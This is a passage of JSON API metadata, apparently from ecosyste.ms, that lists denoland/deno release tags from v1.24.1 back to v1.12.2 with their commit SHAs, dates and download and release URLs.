/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc